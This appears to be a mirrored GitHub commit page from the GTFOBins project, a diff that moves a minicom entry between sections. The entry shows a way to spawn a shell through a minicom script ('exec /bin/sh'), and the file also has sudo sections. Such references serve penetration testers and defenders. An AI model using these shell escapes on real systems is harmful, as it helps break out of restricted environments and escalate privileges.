mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Fix minicom.md
This commit is contained in:
parent
126cb95d3c
commit
75007d78d5
@ -11,6 +11,13 @@ functions:
|
|||||||
After the shell, exit with `Ctrl-A x`.
|
After the shell, exit with `Ctrl-A x`.
|
||||||
code: |
|
code: |
|
||||||
minicom -D /dev/null
|
minicom -D /dev/null
|
||||||
|
- description: |
|
||||||
|
After the shell, exit with `Ctrl-A x`.
|
||||||
|
code: |
|
||||||
|
TF=$(mktemp)
|
||||||
|
echo "! exec /bin/sh <$(tty) 1>$(tty) 2>$(tty)" >$TF
|
||||||
|
minicom -D /dev/null -S $TF
|
||||||
|
reset^J
|
||||||
sudo:
|
sudo:
|
||||||
- description: |
|
- description: |
|
||||||
Start the following command to open the TUI interface, then:
|
Start the following command to open the TUI interface, then:
|
||||||
@ -31,12 +38,4 @@ functions:
|
|||||||
After the shell, exit with `Ctrl-A x`.
|
After the shell, exit with `Ctrl-A x`.
|
||||||
code: |
|
code: |
|
||||||
./minicom -D /dev/null
|
./minicom -D /dev/null
|
||||||
shell:
|
|
||||||
- description: |
|
|
||||||
After the shell, exit with `Ctrl-A x`.
|
|
||||||
code: |
|
|
||||||
TF=$(mktemp)
|
|
||||||
echo "! exec /bin/sh <$(tty) 1>$(tty) 2>$(tty)" >$TF
|
|
||||||
minicom -D /dev/null -S $TF
|
|
||||||
reset^J
|
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user